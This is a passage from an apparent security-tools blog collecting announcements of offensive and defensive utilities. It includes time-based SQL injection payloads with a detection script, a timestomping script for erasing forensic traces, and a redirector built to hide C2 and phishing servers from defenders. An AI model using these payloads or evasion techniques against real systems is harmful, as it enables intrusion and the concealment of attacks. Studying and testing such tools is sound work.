The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.

subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p

Scanning with custom payloads

By default, SqliSniper uses the payloads.txt file. However, the --payload flag can be used to provide a custom payloads file.

./sqlisniper.py -u http://example.com --payload mssql_payloads.txt

While using the custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.

ubuntu:~/sqlisniper$ cat payloads.txt 
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
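
To make the detection idea concrete, here is a hedged sketch of a single time-based check: substitute the sleep marker, inject the payload into one header, and compare the response time against a baseline. The marker name comes from the docs above; the rest is illustrative, not SqliSniper's code.

import time
import requests

def is_delayed(url: str, header: str, payload: str, sleep_s: int = 7) -> bool:
    injected = payload.replace("%__TIME_OUT__%", str(sleep_s))
    t0 = time.time()
    requests.get(url, timeout=sleep_s + 10)  # baseline request, no payload
    baseline = time.time() - t0
    t0 = time.time()
    requests.get(url, headers={header: injected}, timeout=sleep_s + 10)
    elapsed = time.time() - t0
    return elapsed - baseline >= sleep_s     # the server slept -> likely injectable

payload = "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"
print(is_delayed("http://example.com", "X-Forwarded-For", payload))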

Scanning with Single Payloads

If you want to test with only a single payload, the --single-payload flag can be used. Make sure to replace the sleep time with %__TIME_OUT__%.

./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"

Scanning Custom Header

Headers are read from the headers.txt file. To scan a custom header, add the custom HTTP request header to the headers.txt file.

ubuntu:~/sqlisniper$ cat headers.txt 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1

Sending Discord Alert Notifications

SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.

./sqlisniper.py -r url.txt --discord <web_hookurl>

Multi-Threading

Threads can be defined with the --threads flag

 ./sqlisniper.py -r url.txt --threads 10

Note: It is crucial to consider that employing a higher number of threads might lead to potential false positives or overlooking valid issues. Due to the nature of time-based SQL injection, it is recommended to use a lower thread count for more accurate detection.


SqliSniper is made in Python with lots of <3 by @Muhammad Danial.



CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged

By: Zion3R


Execute code within Azure Automation service without getting charged

Description

CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.

  • This flow was reported to Microsoft on 3/23, which decided not to change the service behavior, as it is considered "by design". As of 3/9/23, this tool can still be used without being charged.

  • Each execution is limited to 3 hours


Requirements

  1. Python 3.8+ with the libraries mentioned in the file requirements.txt
  2. Configured Azure CLI - https://learn.microsoft.com/en-us/cli/azure/install-azure-cli
    • Account must be logged in before using this tool

Installation

pip install .

Usage

usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]

CloudMiner - Free computing power in Azure Automation Service

optional arguments:
  -h, --help            show this help message and exit
  --path PATH           the script path (Powershell or Python)
  --id ID               id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/automationAccounts/{automationAccountName}
  -c COUNT, --count COUNT
                        number of executions
  -t TOKEN, --token TOKEN
                        Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
  -r REQUIREMENTS, --requirements REQUIREMENTS
                        Path to requirements file to be installed and used by the script (relevant to Python scripts only)
  -v, --verbose         Enable verbose mode

Example usage

Python

Powershell

License

CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.

Author - Ariel Gamrian



SADProtocol goes to Hollywood

By: Zion3R

Faraday's researchers Javier Aguinaga and Octavio Gianatiempo have investigated IP cameras and found two high-severity vulnerabilities.


This research project began when Aguinaga's wife, a former research leader at Faraday Security, informed him that their IP camera had stopped working. Although Javier was initially asked to fix it, being a security researcher, he opted for a more unconventional approach to tackling the problem. He brought the camera to their office and discussed the issue with Gianatiempo, another security researcher at Faraday. The situation quickly escalated from some light reverse engineering to a full-fledged vulnerability research project, which ended with two high-severity bugs and an exploitation strategy worthy of the big screen.


They uncovered two LAN remote code execution vulnerabilities in EZVIZ’s implementation of Hikvision’s Search Active Devices Protocol (SADP) and SDK server:

  • CVE-2023-34551: EZVIZ’s implementation of Hikvision’s SDK server post-auth stack buffer overflows (CVSS3 8.0 - HIGH)
  • CVE-2023-34552: EZVIZ’s implementation of Hikvision’s SADP packet parser pre-auth stack buffer overflows (CVSS3 8.8 - HIGH)

The affected code is present in several EZVIZ products, which include but are not limited to:


Product Model                              Affected Versions
CS-C6N-B0-1G2WF                            Versions below V5.3.0 build 230215
CS-C6N-R101-1G2WF                          Versions below V5.3.0 build 230215
CS-CV310-A0-1B2WFR                         Versions below V5.3.0 build 230221
CS-CV310-A0-1C2WFR-C                       Versions below V5.3.2 build 230221
CS-C6N-A0-1C2WFR-MUL                       Versions below V5.3.2 build 230218
CS-CV310-A0-3C2WFRL-1080p                  Versions below V5.2.7 build 230302
CS-CV310-A0-1C2WFR Wifi IP66 2.8mm 1080p   Versions below V5.3.2 build 230214
CS-CV248-A0-32WMFR                         Versions below V5.2.3 build 230217
EZVIZ LC1C                                 Versions below V5.3.4 build 230214


These vulnerabilities affect IP cameras and can be used to execute code remotely, so they drew inspiration from the movies and decided to recreate an attack often seen in heist films. The hacker in the group is responsible for hijacking the cameras and modifying the feed to avoid detection. Take, for example, this famous scene from Ocean’s Eleven:



Exploiting either of these vulnerabilities, Javier and Octavio served a victim an arbitrary video stream by tunneling their connection with the camera into an attacker-controlled server, while leaving all other camera features operational. A detailed deep dive into the whole research process can be found in these slides and code. It covers firmware analysis, vulnerability discovery, building a toolchain to compile a debugger for the target, and developing an exploit capable of bypassing ASLR, plus all the details of the Hollywood-style post-exploitation, including tracing, in-memory code patching, and manipulating the execution of the binary that implements most of the camera's features.



This research shows that memory corruption vulnerabilities still abound on embedded and IoT devices, even on products marketed for security applications like IP cameras. Memory corruption vulnerabilities can be detected by static analysis, and implementing secure development practices can reduce their occurrence. These approaches are standard in other industries, evidencing that security is not a priority for embedded and IoT device manufacturers, even when developing security-related products. By filling the gap between IoT hacking and the big screen, this research questions the integrity of video surveillance systems and hopes to raise awareness about the security risks posed by these kinds of devices.



BounceBack - Stealth Redirector For Your Red Team Operation Security

By: Zion3R


BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.

The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.

For more information on tool usage, you may visit the project's wiki.


Features

  • Highly configurable and customizable filter pipeline with boolean-based concatenation of rules that can hide your infrastructure from the keenest blue eyes.
  • Easily extendable project structure; everyone can add rules for their own C2.
  • Integrated and curated massive blacklist of IPv4 pools and ranges known to be associated with IT security vendors, combined with the IP filter to prevent them from using/attacking your infrastructure.
  • Malleable C2 profile parser able to validate inbound HTTP(s) traffic against the Malleable config and reject packets that fail validation.
  • Out-of-the-box domain fronting support allows you to hide your infrastructure a little bit more.
  • Ability to check the IPv4 address of a request against IP geolocation/reverse lookup data and compare it to specified regular expressions, excluding peers connecting from outside allowed companies, nations, cities, domains, etc.
  • All incoming requests may be allowed/disallowed for any time period, so you may configure work-time filters.
  • Support for multiple proxies with different filter pipelines in one BounceBack instance.
  • Verbose logging mechanism allows you to keep track of all incoming requests and events, for analyzing blue-team behaviour and debugging issues.

Rules

BounceBack currently supports the following filters:

  • Boolean-based (and, or, not) rules combinations
  • IP and subnet analysis
  • IP geolocation fields inspection
  • Reverse lookup domain probe
  • Raw packet regexp matching
  • Malleable C2 profiles traffic validation
  • Work (or not) hours rule

Custom rules may be easily added: just register your RuleBaseCreator or RuleWrapperCreator. See the already created RuleBaseCreators and RuleWrapperCreators.

Rules configuration page may be found here.
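
To illustrate what boolean-based rule concatenation means in practice, here is a small Python sketch of the concept (BounceBack itself is written in Go and configured declaratively; the names here are invented for illustration):

from typing import Callable, Dict

Rule = Callable[[Dict], bool]

def and_(*rules: Rule) -> Rule: return lambda req: all(r(req) for r in rules)
def or_(*rules: Rule) -> Rule:  return lambda req: any(r(req) for r in rules)
def not_(rule: Rule) -> Rule:   return lambda req: not rule(req)

ip_blacklisted = lambda req: req["ip"].startswith("198.51.100.")
work_hours     = lambda req: 9 <= req["hour"] < 18
profile_match  = lambda req: req["path"].startswith("/jquery")

allow = and_(not_(ip_blacklisted), work_hours, profile_match)
print(allow({"ip": "203.0.113.7", "hour": 14, "path": "/jquery-3.3.1.min.js"}))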

Proxies

At the moment, BounceBack supports the following protocols:

  • HTTP(s) for your web infrastructure
  • DNS for your DNS tunnels
  • Raw TCP (with or without tls) and UDP for custom protocols

Custom protocols may be easily added: just register your new type in the manager. Example proxy implementations may be found here.

Proxies configuration page may be found here.

Installation

Just download the latest release from the releases page, unzip it, edit the config file, and go.

If you want to build it from source, install goreleaser and run:

goreleaser release --clean --snapshot


SharpShares - Multithreaded C# .NET Assembly To Enumerate Accessible Network Shares In A Domain

By: Zion3R


Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain


Built upon djhohnstein's SharpShares project

> .\SharpShares.exe help

Usage:
SharpShares.exe /threads:50 /ldap:servers /ou:"OU=Special Servers,DC=example,DC=local" /filter:SYSVOL,NETLOGON,IPC$,PRINT$ /verbose /outfile:C:\path\to\file.txt

Optional Arguments:
    /threads  - specify maximum number of parallel threads (default=25)
    /dc       - specify domain controller to query (if not run on a domain-joined host)
    /domain   - specify domain name (if not run on a domain-joined host)
    /ldap     - query hosts from the following LDAP filters (default=all)
         :all                - all enabled computers with 'primary' group 'Domain Computers'
         :dc                 - all enabled Domain Controllers (not read-only DCs)
         :exclude-dc         - all enabled computers that are not Domain Controllers or read-only DCs
         :servers            - all enabled servers
         :servers-exclude-dc - all enabled servers excluding Domain Controllers or read-only DCs
    /ou       - specify LDAP OU to query enabled computer objects from
                ex: "OU=Special Servers,DC=example,DC=local"
    /stealth  - list share names without performing read/write access checks
    /filter   - list of comma-separated shares to exclude from enumeration
                default: SYSVOL,NETLOGON,IPC$,PRINT$
    /outfile  - specify file for shares to be appended to instead of printing to stdout
    /verbose  - return unauthorized shares

Execute Assembly

execute-assembly /path/to/SharpShares.exe /ldap:all /filter:sysvol,netlogon,ipc$,print$

Example Output

Specifying Targets

The /ldap and /ou flags can be used together or separately to generate a list of hosts to enumerate.

All hosts returned from these flags are combined and deduplicated before enumeration starts.



Navgix - A Multi-Threaded Golang Tool That Will Check For Nginx Alias Traversal Vulnerabilities

By: Zion3R


navgix is a multi-threaded golang tool that will check for nginx alias traversal vulnerabilities


Techniques

Currently, navgix supports two techniques for finding vulnerable directories (or location aliases), namely the following:

Heuristics

navgix will make an initial GET request to the page, and if there are any directories referenced in the page's HTML (in src attributes of HTML components), it will test each folder in the path for the vulnerability. Therefore, if it finds a link to /static/img/photos/avatar.png, it will test /static/, /static/img/ and /static/img/photos/.

Brute-force

navgix will also test a short list of common directories that frequently have this vulnerability, and if any of these directories exist, it will also attempt to confirm whether a vulnerability is present.
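
The underlying misconfiguration check can be sketched briefly: if an nginx location such as /static/ is aliased without a trailing slash, requesting /static../ escapes one directory up. A simplified, hedged heuristic (not navgix's exact logic, which is written in Go):

import requests

def alias_traversal(base: str, directory: str) -> bool:
    # If "location /static" is aliased without a trailing slash,
    # "/static../" maps outside the intended directory
    r = requests.get(f"{base}/{directory}../", timeout=5, allow_redirects=False)
    return r.status_code in (200, 403, 301)  # a non-404 answer hints at traversal

for d in ("static", "assets", "img", "files"):
    if alias_traversal("http://example.com", d):
        print(f"[+] possible alias traversal via /{d}../")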

Installation

git clone https://github.com/Hakai-Offsec/navgix; cd navgix;
go build

Acknowledgements



Argus - A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions

By: Zion3R

This repo contains the code for our USENIX Security '23 paper "ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions". Argus is a comprehensive security analysis tool specifically designed for GitHub Actions. Built with an aim to enhance the security of CI/CD workflows, Argus utilizes taint-tracking techniques and an impact classifier to detect potential vulnerabilities in GitHub Action workflows.

Visit our website - secureci.org for more information.


Features

  • Taint-Tracking: Argus uses sophisticated algorithms to track the flow of potentially untrusted data from specific sources to security-critical sinks within GitHub Actions workflows. This enables the identification of vulnerabilities that could lead to code injection attacks.

  • Impact Classifier: Argus classifies identified vulnerabilities into High, Medium, and Low severity classes, providing a clearer understanding of the potential impact of each identified vulnerability. This is crucial in prioritizing mitigation efforts.

Usage

This Python script provides a command line interface for interacting with GitHub repositories and GitHub actions.

python argus.py --mode [mode] --url [url] [--output-folder path_to_output] [--config path_to_config] [--verbose] [--branch branch_name] [--commit commit_hash] [--tag tag_name] [--action-path path_to_action] [--workflow-path path_to_workflow]

Parameters:

  • --mode: The mode of operation. Choose either 'repo' or 'action'. This parameter is required.
  • --url: The GitHub URL. Use USERNAME:TOKEN@URL for private repos. This parameter is required.
  • --output-folder: The output folder. The default value is '/tmp'. This parameter is optional.
  • --config: The config file. This parameter is optional.
  • --verbose: Verbose mode. If this option is provided, the logging level is set to DEBUG. Otherwise, it is set to INFO. This parameter is optional.
  • --branch: The branch name. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --commit: The commit hash. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --tag: The tag. You must provide exactly one of: --branch, --commit, --tag. This parameter is optional.
  • --action-path: The (relative) path to the action. You cannot provide --action-path in repo mode. This parameter is optional.
  • --workflow-path: The (relative) path to the workflow. You cannot provide --workflow-path in action mode. This parameter is optional.

Example:

To use this script to interact with a GitHub repo, you might run a command like the following:

python argus.py --mode repo --url https://github.com/username/repo.git --branch master

This would run the script in repo mode on the master branch of the specified repository.

How to use

Argus can be run inside a docker container. To do so, follow the steps:

  • Install docker and docker-compose
    • apt-get -y install docker.io docker-compose
  • Clone the release branch of this repo
    • git clone <>
  • Build the docker container
    • docker-compose build
  • Now you can run argus. Example run:
    • docker-compose run argus --mode {mode} --url {url to target repo}
  • Results will be available inside the results folder

Viewing SARIF Results

You can view SARIF results either through an online viewer or with a Visual Studio Code (VSCode) extension.

  1. Online Viewer: The SARIF Web Viewer is an online tool that allows you to visualize SARIF files. You can upload your SARIF file (argus_report.sarif) directly to the website to view the results.

  2. VSCode Extension: If you prefer to use VSCode, you can install the SARIF Viewer extension. After installing the extension, you can open your SARIF file (argus_report.sarif) in VSCode. The results will appear in the SARIF Explorer pane, which provides a detailed and navigable view of the results.

Remember to handle the SARIF file with care, especially if it contains sensitive information from your codebase.

Troubleshooting

If GitHub authorization is needed to run, you can provide username:TOKEN in the GITHUB_CREDS environment variable. This will be used for all requests made to GitHub. Note: we do not store this information anywhere, nor do we create anything in the GitHub account; we only use it for cloning repositories.

Contributions

Argus is an open-source project, and we welcome contributions from the community. Whether it's reporting a bug, suggesting a feature, or writing code, your contributions are always appreciated!

Cite Argus

If you use Argus in your research, please cite our paper:

@inproceedings{muralee2023Argus,
  title     = {ARGUS: A Framework for Staged Static Taint Analysis of GitHub Workflows and Actions},
  author    = {S. Muralee and I. Koishybayev and A. Nahapetyan and G. Tystahl and B. Reaves and A. Bianchi and W. Enck and A. Kapravelos and A. Machiry},
  booktitle = {32nd USENIX Security Symposium (USENIX Security 23)},
  year      = {2023},
}


Nemesis - An Offensive Data Enrichment Pipeline

By: Zion3R


Nemesis is an offensive data enrichment pipeline and operator support system.

Built on Kubernetes with scale in mind, our goal with Nemesis was to create a centralized data processing platform that ingests data produced during offensive security assessments.

Nemesis aims to automate a number of repetitive tasks operators encounter on engagements, empower operators’ analytic capabilities and collective knowledge, and create structured and unstructured data stores of as much operational data as possible to help guide future research and facilitate offensive data analysis.


Setup / Installation

See the setup instructions.

Contributing / Development Environment Setup

See development.md

Further Reading

Post Name                                    Publication Date   Link
Hacking With Your Nemesis                    Aug 9, 2023        https://posts.specterops.io/hacking-with-your-nemesis-7861f75fcab4
Challenges In Post-Exploitation Workflows    Aug 2, 2023        https://posts.specterops.io/challenges-in-post-exploitation-workflows-2b3469810fe9
On (Structured) Data                         Jul 26, 2023       https://posts.specterops.io/on-structured-data-707b7d9876c6

Acknowledgments

Nemesis is built on a large chunk of other people's work. Throughout the codebase we've provided citations, references, and applicable licenses for anything used or adapted from public sources. If we've forgotten proper credit anywhere, please let us know or submit a pull request!

We also want to acknowledge Evan McBroom, Hope Walker, and Carlo Alcantara from SpecterOps for their help with the initial Nemesis concept and amazing feedback throughout the development process.



Melee - Tool To Detect Infections In MySQL Instances

By: Zion3R

MELEE: A Tool to Detect Ransomware Infections in MySQL Instances


Attackers are abusing MySQL instances to conduct nefarious operations on the Internet. Cybercriminals are targeting exposed MySQL instances and triggering infections at scale to exfiltrate data, destroy data, and extort money via ransom. For example, one of the most significant threats MySQL deployments face is ransomware. We have authored a tool named "MELEE" to detect potential infections in MySQL instances. The tool allows security researchers, penetration testers, and threat intelligence experts to detect compromised and infected MySQL instances running malicious code. The tool also enables you to conduct efficient research in the field of malware targeting cloud databases. In this release, the following modules are supported (a sketch of one detection heuristic follows the list):

  • MySQL instance information gathering and reconnaissance
  • MySQL instance exposure to the Internet
  • MySQL access permissions for assessing remote command execution
  • MySQL user enumeration
  • MySQL ransomware infections
  • Basic assessment checks for detecting ransomware infections
  • Extensive assessment checks for extracting insidious details about potential ransomware infections
  • MySQL ransomware detection and scanning for both unauthenticated and authenticated deployments
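
A sketch of one such heuristic, hedged and illustrative rather than MELEE's actual code: connect to the instance and look for database names typical of MySQL ransom notes.

import pymysql  # pip install pymysql

RANSOM_HINTS = ("readme", "recover", "please_read", "warning")  # illustrative indicators

def ransom_indicators(host: str, user: str = "root", password: str = ""):
    conn = pymysql.connect(host=host, user=user, password=password, connect_timeout=5)
    with conn.cursor() as cur:
        cur.execute("SHOW DATABASES")
        names = [row[0].lower() for row in cur.fetchall()]
    conn.close()
    return [n for n in names if any(hint in n for hint in RANSOM_HINTS)]

print(ransom_indicators("203.0.113.10"))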

Tool Usage

Researched and Developed by Aditya K Sood and Rohit Bansal

Sncscan - Tool For Analyzing SAP Secure Network Communications (SNC)

By: Zion3R


Tool for analyzing SAP Secure Network Communications (SNC).

How to use?

In its current state, sncscan can be used to read the SNC configurations for SAP Router and DIAG (SAP GUI) connections. The implementation for the SAP RFC protocol is currently in development.


SAP Router

SAP Routers can either support SNC or not; a more granular configuration of the SNC parameters is not possible. Nevertheless, sncscan can find out whether it is activated:

sncscan -H 10.3.161.4 -S 3299 -p router

DIAG / SAP GUI

The SNC configuration of a DIAG connection used by a SAP GUI can have more versatile settings than the router configuration. A detailed overview of the system parameters that can be read with sncscan and that impact the connection's security is given in the section Background.

sncscan -H 10.3.161.3 -S 3200 -p diag

Multiple targets can be scanned with one command:

sncscan -L /H/192.168.56.101/S/3200,/H/192.168.56.102/S/3206 

Through SAP Router

sncscan --route-string /H/10.3.161.5/S/3299/H/10.3.161.3/S/3200 -p diag

Install

Requirements: Currently sncscan only works with the pysap library from our fork.

python3 -m pip install -r requirements.txt

or

python3 setup.py test
python3 setup.py install

Background: SNC system parameters

SNC Basics

SAP protocols, such as DIAG or RFC, do not provide high security themselves. To increase security and ensure Authentication, Integrity and Encryption, the use of SNC (Secure Network Communications) is required. SNC protects the data communication paths between various client and server components of the SAP system that use the RFC, DIAG or router protocol by applying known cryptographic algorithms to the data in order to increase its security. There are three different levels of data protection, that can be applied for an SNC secured connection:

  1. Authentication only: Verifies the identity of the communication partners
  2. Integrity protection: Protection against manipulation of the data
  3. Confidentiality protection: Encrypts the transmitted messages

SNC Parameter

Each SAP system can be configured with SNC parameters for the communication security. The level of the SNC connection is determined by the Quality of Protection parameters:

  • snc/data_protection/min: minimum security level required for SNC connections
  • snc/data_protection/max: highest security level, initiated by the SAP system
  • snc/data_protection/use: default security level, initiated from the SAP system

Additional SNC parameters can be used for further system-specific configuration options, including the snc/only_encrypted_gui parameter, which ensures that encrypted SAPGUI connections are enforced.

Reading out SNC Parameters

As long as an SAP system capable of sending SNC messages is addressed, it responds to valid SNC requests, regardless of which IP, port, and CN were specified for SNC. This response contains the requirements that the SAP system has for the SNC connection, which can then be used to obtain the SNC parameters. This can be used to find out whether an SAP system has SNC enabled and, if so, which SNC parameters have been set.



Stompy - Timestomp Tool To Flatten MAC Times With A Specific Timestamp

By: Zion3R


A PowerShell function to perform timestomping on specified files and directories. The function can modify timestamps recursively for all files in a directory.

  • Change timestamps for individual files or directories.
  • Recursively apply timestamps to all files in a directory.
  • Option to use specific credentials for remote paths or privileged files.

I've ported Stompy to C#, Python and Go; the relevant versions are linked in this repo, each with its own README.

Usage

  • -Path: The path to the file or directory whose timestamps you wish to modify.
  • -NewTimestamp: The new DateTime value you wish to set for the file or directory.
  • -Credentials: (Optional) If you need to specify a different user's credentials.
  • -Recurse: (Switch) If specified, apply the timestamp recursively to all files in the given directory.
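
Since a Python port is mentioned above, here is a minimal sketch of the core operation it would perform: set access and modification times, optionally recursing through a directory. (Setting the Windows creation time additionally requires pywin32; this sketch is illustrative, not the port itself.)

import os
from datetime import datetime

def stomp(path: str, new_ts: str, recurse: bool = False):
    ts = datetime.strptime(new_ts, "%m/%d/%Y %I:%M:%S %p").timestamp()
    targets = [path]
    if recurse and os.path.isdir(path):
        for root, _, files in os.walk(path):
            targets.extend(os.path.join(root, f) for f in files)
    for target in targets:
        os.utime(target, (ts, ts))  # (atime, mtime)

stomp(r"C:\path\to\file.txt", "01/01/2023 12:00:00 AM")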

Usage Examples

Specify the -Recurse switch to apply timestamps recursively:

  1. Change the timestamp of an individual file:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM"
  2. Recursively change timestamps for all files in a directory:
Invoke-Stompy -Path "C:\path\to\file.txt" -NewTimestamp "01/01/2023 12:00:00 AM" -Recurse
  3. Use specific credentials:

PurpleKeep - Providing Azure Pipelines To Create An Infrastructure And Run Atomic Tests

By: Zion3R


With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.

To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. It leverages the capabilities of the Atomic Red Team project, which allows simulating attacks that follow MITRE TTPs (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for evaluating the effectiveness of detection rules.

Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.

Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.

To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.

TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.


Requirements

The project is based on Azure Pipelines and requires the following to be able to run:

  • Azure Service Connection to a resource group as described in the Microsoft Docs
  • Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application
  • MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and made accessible to the pipelines

Optional

You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.

Refer to the variables file for your configurable items.

Design

Infrastructure

Deploying the infrastructure uses the Azure Pipeline to perform the following steps:

  • Deploy Azure services:
    • Key Vault
    • Log Analytics Workspace
    • Data Collection Endpoint
    • Data Collection Rule
  • Generate an SSH keypair and a password for the Windows account and store them in the Key Vault
  • Create a Windows 11 VM
  • Install OpenSSH
  • Configure and deploy the SSH public key
  • Install Invoke-AtomicRedTeam
  • Install Microsoft Defender for Endpoint and configure exceptions
  • (Optional) Apply security and/or audit policy files
  • Reboot

Simulation

Currently, only the Atomics from the public repository are supported. The pipeline takes a single Technique ID or a comma-separated list of techniques as input, for example:

  • T1059.003
  • T1027,T1049,T1003

The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.
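For example, a minimal KQL sketch for reviewing the most recent simulation logs (the AtomicLogs_CL table name comes from above; the column selection is an assumption, so project whatever your ingestion actually provides):

AtomicLogs_CL
| where TimeGenerated > ago(1d)
| sort by TimeGenerated desc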

There are currently two ways to run the simulation:

Rotating simulation

This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytics workspace will retain the logs of each run.

Warning: this will onboard a large number of hosts into your EDR

Single deploy simulation

A fresh infrastructure will be deployed only at the beginning of the pipeline, and all TTPs will be simulated on this single instance. This is the fastest way to simulate and prevents onboarding a large number of devices, but running many simulations in the same environment risks contaminating it and making the simulations less stable and predictable.

TODO

Must have

  • Check if prerequisites have been fulfilled before executing the atomic
  • Provide the ability to import your own group policy
  • Clean up Bicep templates and pipelines by using a master template (Complete build)
  • Build a pipeline that runs techniques sequentially with reboots in between
  • Add the Azure ServiceConnection to variables instead of parameters

Nice to have

  • MDE Off-boarding (?)
  • Automatically join and leave an AD domain
  • Make the Atomics repository configurable
  • Deploy VECTR as part of the infrastructure and ingest results during simulation. Also see the VECTR API issue
  • Tune the alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)
  • Add C2 infrastructure for manual or C2-based simulations

Issues

  • Atomics do not report whether a simulation succeeded
  • Unreliable OpenSSH extension installer failing infrastructure deployment
  • Spamming onboarded devices in the EDR



BucketLoot - An Automated S3-compatible Bucket Inspector

By: Zion3R


BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response; if the storage bucket contains more than 1000 entries the user would like to scan, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

Features

Secret Scanning

Scans for 80+ unique regex signatures that can help uncover secret exposures, tagged with their severity, in the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!

Sensitive File Checks

Accidental sensitive file leakages are a big problem that affects the security posture of individuals and organisations. BucketLoot ships with a list of 80+ unique regex signatures in vulnFiles.json, which allows users to flag these sensitive files based on file names or extensions.

Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from the response body for scanning.

Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs, subdomains and domains present in an exposed storage bucket, giving you a chance of discovering hidden endpoints and an edge over traditional recon tools.

Searching

The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

To know more about our Attack Surface Management platform, check out NVADR.



Raven - CI/CD Security Analyzer

By: Zion3R


RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.

With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub. All vulnerabilities discovered using Raven are listed in the tool's Hall of Fame.


What is Raven

The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:

  • Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
  • Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
  • Query Library: We created a library of pre-defined queries based on research conducted by the community.
  • Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.

Possible usages for Raven:

  • Scanner for your own organization's security
  • Scanning specified organizations for bug bounty purposes
  • Scan everything and report issues found to save the internet
  • Research and learning purposes

This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.

Why Raven

In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:

  • A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
  • We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
  • We detailed a completely different attack vector, 3rd-party integration risks, affecting the most popular project on GitHub and thousands more.
